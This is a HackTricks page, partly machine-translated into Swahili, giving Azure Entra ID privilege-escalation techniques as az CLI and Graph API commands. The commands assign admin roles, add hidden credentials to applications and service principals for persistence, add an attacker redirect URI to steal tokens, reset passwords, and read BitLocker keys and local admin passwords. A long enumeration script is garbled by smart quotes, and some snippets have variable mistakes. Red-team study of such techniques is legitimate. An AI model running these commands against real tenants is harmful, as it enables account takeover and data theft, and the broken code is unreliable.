Az - EntraID Privesc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

Note

Kumbuka kwamba si ruhusa zote za kina ambazo built-in roles zina katika Entra ID zinastahiki kutumika katika custom roles.

Majukumu

Role: Privileged Role Administrator

Wadhifa huu una ruhusa za kina zinazohitajika ili kuweza kuteua roles kwa principals na kutoa ruhusa zaidi kwa roles. Vitendo vyote viwili vinaweza kutumika vibaya kupandisha hadhi za ruhusa.

Kuteua role kwa mtumiaji:

# List enabled built-in roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"

# Give role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

Ongeza ruhusa zaidi kwa role:

# List only custom roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'

# Change the permissions of a custom role
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
"description": "Update basic properties of application registrations",
"rolePermissions": [
{
"allowedResourceActions": [
"microsoft.directory/applications/credentials/update"
]
}
]
}'

Hii inamruhusu mshambuliaji kuongeza vitambulisho (nywila au vyeti) kwa programu zilizopo. Ikiwa programu ina ruhusa za kipaumbele, mshambuliaji anaweza kujithibitisha kama programu hiyo na kupata ruhusa hizo.

# Generate a new password without overwritting old ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwritting old ones
az ad app credential reset --id <appId> --create-cert

`microsoft.directory/applications.myOrganization/credentials/update`

Hii inaruhusu vitendo sawa na applications/credentials/update, lakini imepangwa kwa maombi ya directory moja.

az ad app credential reset --id <appId> --append

`microsoft.directory/applications/owners/update`

Kwa kujiongeza wao wenyewe kama owner, mshambuliaji anaweza kuathiri application, ikiwa ni pamoja na credentials na permissions.

az ad app owner add --id <AppId> --owner-object-id <UserId>
az ad app credential reset --id <appId> --append

# You can check the owners with
az ad app owner list --id <appId>

`microsoft.directory/applications/allProperties/update`

Mshambuliaji anaweza kuongeza redirect URI kwa applications zinazotumika na watumiaji wa tenanti kisha kuwashirikisha login URLs zinazotumia redirect URL mpya ili kuiba tokens zao. Kumbuka kwamba ikiwa mtumiaji tayari alikuwa ameingia kwenye application, authentication itafanyika moja kwa moja bila mtumiaji hajaidhinisha chochote.

Pia inawezekana kubadilisha ruhusa zinazohitajwa na application ili kupata ruhusa zaidi, lakini katika kesi hiyo mtumiaji atahitaji kukubali tena maombi yanayoomba ruhusa zote.

# Get current redirect uris
az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
# Add a new redirect URI (make sure to keep the configured ones)
az ad app update --id <app-id> --web-redirect-uris "https://original.com/callback https://attack.com/callback"

Kupandishwa kwa Ruhusa za Programu

Kama ilivyoelezwa katika nakala hii, ilikuwa kawaida sana kupata program za default ambazo zina API permissions za aina Application zimepangwa kwao. API Permission (kama inavyoitwa kwenye Entra ID console) ya aina Application ina maana kwamba application inaweza kufikia API na kutekeleza vitendo bila muktadha wa mtumiaji (bila mtumiaji kuingia kwenye app), na bila kuhitaji Entra ID roles kuiruhusu. Kwa hiyo, ni kawaida sana kupata applications zenye ruhusa za juu katika kila Entra ID tenant.

Kisha, ikiwa attacker ana ruhusa/role yoyote inayomruhusu update the credentials (secret o certificate) of the application, attacker anaweza kutengeneza credential mpya na kisha kuitumia authenticate as the application, kupata ruhusa zote ambazo application ina.

Tambua kuwa blog iliyotajwa inaonyesha baadhi ya API permissions za programu za default za Microsoft — hata hivyo muda mfupi baada ya ripoti hii Microsoft ilirekebisha tatizo hili na sasa haiwezekani kuingia kama Microsoft applications tena. Hata hivyo, bado inawezekana kupata custom applications with high privileges that could be abused.

Jinsi ya kuorodhesha API permissions za application:

# Get "API Permissions" of an App
## Get the ResourceAppId
az ad app show --id "<app-id>" --query "requiredResourceAccess" --output json
## e.g.
[
{
"resourceAccess": [
{
"id": "e1fe6dd8-ba31-4d61-89e7-88639da4683d",
"type": "Scope"
},
{
"id": "d07a8cc0-3d51-4b77-b3b0-32704d1f69fa",
"type": "Role"
}
],
"resourceAppId": "00000003-0000-0000-c000-000000000000"
}
]

## For the perms of type "Scope"
az ad sp show --id <ResourceAppId> --query "oauth2PermissionScopes[?id=='<id>'].value" -o tsv
az ad sp show --id "00000003-0000-0000-c000-000000000000" --query "oauth2PermissionScopes[?id=='e1fe6dd8-ba31-4d61-89e7-88639da4683d'].value" -o tsv

## For the perms of type "Role"
az ad sp show --id <ResourceAppId> --query "appRoles[?id=='<id>'].value" -o tsv
az ad sp show --id 00000003-0000-0000-c000-000000000000 --query "appRoles[?id=='d07a8cc0-3d51-4b77-b3b0-32704d1f69fa'].value" -o tsv

Pata ruhusa za API za programu zote na alama API zinazomilikiwa na Microsoft

```bash #!/usr/bin/env bash set -euo pipefail

Known Microsoft first-party owner organization IDs.

MICROSOFT_OWNER_ORG_IDS=( “f8cdef31-a31e-4b4a-93e4-5f571e91255a” “72f988bf-86f1-41af-91ab-2d7cd011db47” )

is_microsoft_owner() { local owner=“$1” local id for id in “${MICROSOFT_OWNER_ORG_IDS[@]}”; do if [ “$owner” = “$id” ]; then return 0 fi done return 1 }

get_permission_value() { local resource_app_id=“$1” local perm_type=“$2” local perm_id=“$3” local key value key=“${resource_app_id}|${perm_type}|${perm_id}”

value=“$(awk -F ‘\t’ -v k=”$key“ ‘$1==k {print $2; exit}’ “$tmp_perm_cache”)“ if [ -n “$value” ]; then printf ‘%s\n’ “$value” return 0 fi

if [ “$perm_type” = “Scope” ]; then value=“$(az ad sp show –id “$resource_app_id” –query “oauth2PermissionScopes[?id==‘$perm_id’].value | [0]” -o tsv 2>/dev/null || true)“ elif [ “$perm_type” = “Role” ]; then value=“$(az ad sp show –id “$resource_app_id” –query “appRoles[?id==‘$perm_id’].value | [0]” -o tsv 2>/dev/null || true)“ else value=“” fi

[ -n “$value” ] || value=“UNKNOWN” printf ‘%s\t%s\n’ “$key” “$value” >> “$tmp_perm_cache” printf ‘%s\n’ “$value” }

command -v az >/dev/null 2>&1 || { echo “az CLI not found” >&2; exit 1; } command -v jq >/dev/null 2>&1 || { echo “jq not found” >&2; exit 1; } az account show >/dev/null

apps_json=“$(az ad app list –all –query ‘[?length(requiredResourceAccess) > 0].[displayName,appId,requiredResourceAccess]’ -o json)”

tmp_map=“$(mktemp)” tmp_ids=“$(mktemp)” tmp_perm_cache=“$(mktemp)” trap ‘rm -f “$tmp_map” “$tmp_ids” “$tmp_perm_cache”’ EXIT

Build unique resourceAppId values used by applications.

jq -r ‘.[][2][]?.resourceAppId’ <<<“$apps_json” | sort -u > “$tmp_ids”

Resolve resourceAppId -> owner organization + API display name.

while IFS= read -r rid; do [ -n “$rid” ] || continue sp_json=“$(az ad sp show –id “$rid” –query ‘{owner:appOwnerOrganizationId,name:displayName}’ -o json 2>/dev/null || true)“ owner=“$(jq -r ‘.owner // “UNKNOWN”’ <<<“$sp_json”)“ name=“$(jq -r ‘.name // “UNKNOWN”’ <<<“$sp_json”)“ printf ‘%s\t%s\t%s\n’ “$rid” “$owner” “$name” >> “$tmp_map” done < “$tmp_ids”

echo -e “appDisplayName\tappId\tresourceApiDisplayName\tresourceAppId\tisMicrosoft\tpermissions”

Print all app API permissions and mark if the target API is Microsoft-owned.

while IFS= read -r row; do app_name=“$(jq -r ‘.[0]’ <<<”$row“)“ app_id=“$(jq -r ‘.[1]’ <<<”$row“)“

while IFS= read -r rra; do resource_app_id=“$(jq -r ‘.resourceAppId’ <<<”$rra“)“ map_line=“$(awk -F ‘\t’ -v id=”$resource_app_id“ ‘$1==id {print; exit}’ “$tmp_map”)“ owner_org=“$(awk -F’\t’ ‘{print $2}’ <<<”$map_line“)“ resource_name=“$(awk -F’\t’ ‘{print $3}’ <<<”$map_line“)“

[ -n “$owner_org” ] || owner_org=“UNKNOWN” [ -n “$resource_name” ] || resource_name=“UNKNOWN”

if is_microsoft_owner “$owner_org”; then is_ms=“true” else is_ms=“false” fi

permissions_csv=“” while IFS= read -r access; do perm_type=“$(jq -r ‘.type’ <<<”$access“)“ perm_id=“$(jq -r ‘.id’ <<<”$access“)“ perm_value=“$(get_permission_value “$resource_app_id” “$perm_type” “$perm_id”)“ perm_label=“${perm_type}:${perm_value}” if [ -z “$permissions_csv” ]; then permissions_csv=“$perm_label” else permissions_csv=“${permissions_csv},${perm_label}” fi done < <(jq -c ‘.resourceAccess[]’ <<<“$rra”)

echo -e “${app_name}\t${app_id}\t${resource_name}\t${resource_app_id}\t${is_ms}\t${permissions_csv}” done < <(jq -c ‘.[2][]’ <<<“$row”) done < <(jq -c ‘.[]’ <<<“$apps_json”)

</details>

## Service Principals

### `microsoft.directory/servicePrincipals/credentials/update`

Hii inaruhusu mshambuliaji kuongeza credentials kwa service principals zilizopo. Ikiwa service principal ana elevated privileges, mshambuliaji anaweza kupata na kutumia privileges hizo.
```bash
az ad sp credential reset --id <sp-id> --append

Caution

Nenosiri jipya lililotengenezwa halitaonekana kwenye konsoli ya wavuti, hivyo hii inaweza kuwa njia ya siri ya kudumisha uendelevu kwa service principal.
Zinaweza kupatikana kutoka kwenye API kwa: az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json

Ikiwa unapata kosa "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid." ni kwa sababu haiwezekani kubadili property ya passwordCredentials ya SP na kwanza unahitaji kuifungua. Kwa hilo unahitaji ruhusa (microsoft.directory/applications/allProperties/update) inayokuwezesha kutekeleza:

az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<sp-object-id> --body '{"servicePrincipalLockConfiguration": null}'

`microsoft.directory/servicePrincipals/synchronizationCredentials/manage`

Hii inamruhusu mshambulizi kuongeza credentials kwa service principals zilizopo. Ikiwa service principal ina privileges zilizoinuliwa, mshambulizi anaweza kuchukua haki hizo.

az ad sp credential reset --id <sp-id> --append

`microsoft.directory/servicePrincipals/owners/update`

Kama ilivyo kwa applications, ruhusa hii inaruhusu kuongeza wamiliki zaidi kwa service principal. Kumiliki service principal kunaruhusu kudhibiti credentials na permissions zake.

# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id <sp-id> --append

# You can check the owners with
az ad sp owner list --id <spId>

Caution

Baada ya kuongeza owner mpya, nilijaribu kuiondoa lakini API ilijibu kwamba method ya DELETE haikuungwa mkono, hata ingawa ndiyo method unayohitaji kutumia ku-delete owner. Kwa hivyo huwezi kuondoa owners kwa sasa.

`microsoft.directory/servicePrincipals/disable` na `enable`

Permissions hizi zinawezesha ku-disable na ku-enable service principals. An attacker anaweza kutumia permission hii ku-enable service principal ambayo anaweza kupata access kwa njia fulani ili escalate privileges.

Kumbuka kwamba kwa technique hii attacker atahitaji permissions zaidi ili take over service principal iliyokuwa enabled.

# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true

`microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials` & `microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials`

Ruhusa hizi zinaruhusu kuunda na kupata credentials za single sign-on, ambazo zinaweza kuruhusu kufikia programu za mtu wa tatu.

# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"


# Get credentials of a specific credID
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"

Vikundi

`microsoft.directory/groups/allProperties/update`

Ruhusa hii inaruhusu kuongeza watumiaji kwenye vikundi vyenye ruhusa za juu, na hivyo kusababisha kupanda kwa ruhusa.

az ad group member add --group <GroupName> --member-id <UserId>

Note: Ruhusa hii haijumuishi Entra ID role-assignable groups.

`microsoft.directory/groups/owners/update`

Ruhusa hii inaruhusu mtu kuwa mmiliki wa makundi. Mmiliki wa kundi anaweza kudhibiti uanachama wa kundi na mipangilio, na hivyo kuweza kuongeza ruhusa kwa kundi.

az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>

Kumbuka: Ruhusa hii haijumuishi Entra ID vikundi vinavyoweza kupewa jukumu.

`microsoft.directory/groups/members/update`

Ruhusa hii inaruhusu kuongeza wanachama kwenye kikundi. Mshambuliaji anaweza kujiongeza mwenyewe au kuongeza akaunti zenye madhara kwenye vikundi vyenye hadhi, na hivyo kupata ufikiaji ulioboreshwa.

az ad group member add --group <GroupName> --member-id <UserId>

`microsoft.directory/groups/dynamicMembershipRule/update`

Ruhusa hii inaruhusu kusasisha membership rule katika dynamic group. Attacker anaweza kubadilisha dynamic rules ili kujijumuisha yeye mwenyewe katika privileged groups bila kuongezwa wazi.

groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'

Note: Ruhusa hii haitumiki kwa vikundi vinavyoweza kupewa majukumu vya Entra ID.

Dynamic Groups Privesc

Inawezekana kwa watumiaji kuongeza mamlaka kwa kubadilisha mali zao ili kuongezwa kama wanachama wa dynamic groups. Kwa maelezo zaidi angalia:

Az - Dynamic Groups Privesc

Watumiaji

`microsoft.directory/users/password/update`

Ruhusa hii inaruhusu kuweka upya nywila kwa watumiaji wasiokuwa admin, ikimruhusu mshambuliaji kuongeza mamlaka kwa watumiaji wengine. Ruhusa hii haiwezi kutolewa kwa majukumu yaliyobinafsishwa.

az ad user update --id <user-id> --password "kweoifuh.234"

`microsoft.directory/users/basic/update`

Ruhusa hii inaruhusu kubadilisha sifa za mtumiaji. Ni kawaida kupata dynamic groups zinazoongeza watumiaji kulingana na thamani za sifa; hivyo ruhusa hii inaweza kumruhusu mtumiaji kuweka thamani ya sifa inayohitajika ili kuwa mwanachama wa dynamic group maalum na kupandisha ruhusa.

#e.g. change manager of a user
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'

#e.g. change department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"

Sera za Conditional Access na kuepuka MFA

Sera za Conditional Access zilizopangwa vibaya zinazohitaji MFA zinaweza kupitilizwa, angalia:

Az - Conditional Access Policies & MFA Bypass

Vifaa

`microsoft.directory/devices/registeredOwners/update`

Ruhusa hii inawawezesha wadukuzi kujipatia wenyewe kama wamiliki wa vifaa ili kupata udhibiti au kufikia mipangilio na data maalum ya kifaa.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

`microsoft.directory/devices/registeredUsers/update`

Ruhusa hii inawawezesha washambuliaji kuhusisha akaunti yao na vifaa ili kupata ufikiaji au kuepuka sera za usalama.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

`microsoft.directory/deviceLocalCredentials/password/read`

Ruhusa hii inawawezesha attackers kusoma sifa za backed up local administrator account credentials kwa vifaa vilivyojiunga na Microsoft Entra, ikiwa ni pamoja na password

# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLC="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \

BitlockerKeys

`microsoft.directory/bitlockerKeys/key/read`

Ruhusa hii inaruhusu kupata BitLocker keys, ambayo inaweza kumwezesha mshambuliaji ku-decrypt drives, na hivyo kuhatarisha usiri wa data.

# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"

Ruhusa Nyingine Zinazovutia (TODO)

microsoft.directory/applications/permissions/update
microsoft.directory/servicePrincipals/permissions/update
microsoft.directory/applications.myOrganization/allProperties/update
microsoft.directory/applications/allProperties/update
microsoft.directory/servicePrincipals/appRoleAssignedTo/update
microsoft.directory/applications/appRoles/update
microsoft.directory/applications.myOrganization/permissions/update

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.